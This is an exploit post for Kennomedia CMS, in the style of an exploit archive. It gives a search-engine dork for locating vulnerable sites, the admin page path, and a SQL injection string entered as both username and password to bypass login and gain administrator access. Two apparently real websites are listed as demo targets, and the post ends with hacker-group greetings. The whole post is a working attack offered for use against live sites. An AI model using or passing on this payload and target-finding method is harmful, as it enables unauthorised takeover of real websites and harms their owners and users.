facebook facebook twitter rss

Kennomedia CMS Authentication Bypass

Author: White Tiger , Published: 18-06-2015
# Exploit Title : Kennomedia CMS Authentication Bypass

# Date : 02/04/2015

# Exploit Author : White Tiger

# Contact : aalireza65@yahoo.com | Skype: White.tigerhc

# Category : Web Application Bugs

# Home : Iran-Cyber.Org

# Google Dork : intext:powered By Egysign

# Tested On : Windows



1. Description



By This Vulenarabity You Can Bypass Authentication And Get Logged In Like An Admin.



2. Proof Of Concept



You Can Find Targets By 2 Ways :



In That Address Are Many Targets.After You Selected Your Target Use This Exploit :



# http://site.com/admin



Then If The Admin Page Comes,Use These Usernames And Passwords :



Username : '=''or'

Password : '=''or'



Second Way :



Search This Dork : intext:powered By Egysign



Then Use This Exploit :



# http://site.com/admin



Then If The Admin Page Comes,Use These Usernames And Passwords :



Username : '=''or'

Password : '=''or'





# Demo :

# http://www.vicomte-a.eu/admin/

# http://www.ior.ro/admin/

=========================================

Greetz : | MOHAMAD_NOFOZI | Root3r | Sheytan Azzam | KamraN HellisH | JOK3R | Erfan Mig | Alireza_ProMis | Mr.Moein | Pi.Hack | CRYSIS | Siyahi |



Visit Us :



Iran-Cyber.Org

Like us on Facebook :